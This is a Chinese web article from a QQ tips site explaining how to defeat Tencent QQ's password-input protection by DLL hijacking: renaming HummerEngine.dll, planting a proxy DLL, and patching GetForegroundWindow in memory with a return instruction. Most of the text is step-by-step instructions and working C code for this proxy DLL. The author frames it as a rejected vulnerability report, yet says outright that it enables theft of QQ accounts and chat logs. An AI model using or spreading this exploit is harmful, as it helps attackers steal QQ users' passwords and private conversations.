首页 > QQ技巧 > 正文

另类方法停止QQ的输入密码保护 可以截取聊天记录等

时间:2013-10-10 11:18 作者:QQ地带 我要评论

先给结果,qq输入密码保护就废掉了。
 

===================================
 
这里发表的看法,经代表个人啊!与我所在的公司无关,大家放心的永远用吧!我提交了这个问题,被腾讯给否定了,个人认为是不是dll劫持很重要吗?起码你们的保护被击破了吧?别人可以利用这个盗取qq号码和聊天内容吧,还有我很好奇,你们说忽略的问题,永不修复,我就要看看你们修复不修复
 
前些天qq密码闹得沸沸扬扬的
但是都没有好的方法向qq里面注入一个dll文件
下面看我的方法
首先qq一定会加载HummerEngine.dll这个文件,好的我们就开始劫持这个文件
 
但是这个文件就在qq目录下,那么我们怎么操作呢?
我们先来看看dll劫持原理:利用不在同一目录下的同名dll的加载优先级玩的
那么我们能否这样做呢?先给同目录下的某个dll修改一下名字,我们再把自己构造的dll放到这个目录下,程序是不是顺利的跑起来了?
 
下面看我的操作步骤
1.给原来qq目录下的HummerEngine.dll 修改为HummerEngineTest.dll
2.我们把自己打造的HummerEngine.dll放到qq目录下
 
接着在RunQQHummerEngine函数里面添加停止qq保护代码
 
代码:
 
void DisableGetForegroundWindow()
{
    HMODULE hUser32;
    LPBYTE pfn;
    DWORD dwOldProtect;
    hUser32 = LoadLibraryW(L"user32.dll");
    pfn = (LPBYTE)GetProcAddress(hUser32,"GetForegroundWindow");
    VirtualProtect(pfn,16,PAGE_EXECUTE_READWRITE,&dwOldProtect);
    pfn[0] = 0xC3; //retn
}
 
DWORD __stdcall workerThread(LPVOID lparam)
{
    DisableGetForegroundWindow();
 
    return 0;
}
 
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 入口函数
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        DisableThreadLibraryCalls(hModule);
 
        Hook::Hook();
    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
        Free();
        Hook::Unhook();
 
    }
 
    return TRUE;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
 
 
 
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
ALCDECL AheadLib_RunQQHummerEngine(void)
{
    // 保存返回地址
    __asm POP m_dwReturn[0 * TYPE long];
 
    CreateThread(NULL,0,workerThread,0,0,NULL);
 
    // 调用原始函数
    GetAddress("RunQQHummerEngine")();
 
    // 转跳到返回地址
    __asm JMP m_dwReturn[0 * TYPE long];
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

标签: qq
顶一下
(0)
0%
踩一下
(1)
100%

Google提供的广告